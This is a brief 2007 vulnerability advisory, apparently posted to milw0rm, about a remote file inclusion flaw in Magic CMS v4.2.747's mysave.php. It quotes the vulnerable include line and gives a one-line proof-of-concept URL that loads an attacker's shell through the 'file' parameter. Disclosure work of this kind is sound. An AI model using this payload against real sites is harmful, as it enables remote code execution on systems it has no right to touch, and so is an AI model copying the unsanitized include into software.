\#'#/
(-.-)
---------------------oOO---(_)---OOo---------------------
| Magic CMS v4.2.747 (mysave.php) Remote File Inclusion |
| (works only with register_globals = on) |
| coded by DNX |
---------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: www.geo-soft.net/de-ch/
[!] Detected: 03.03.2007
[!] Reported: 03.03.2007
[!] Remote: yes
[!] Background: Magic CMS is an easy to use content
management system based on PHP.
[!] Bug: $file in mysave.php line 3
@include($file."/myconfig.php");
[!] PoC: http://[site]/[path]/mysave.php?file=[shell]
[!] Solution: Waiting for patch/update. No response from
vendor.
# milw0rm.com [2007-03-08]
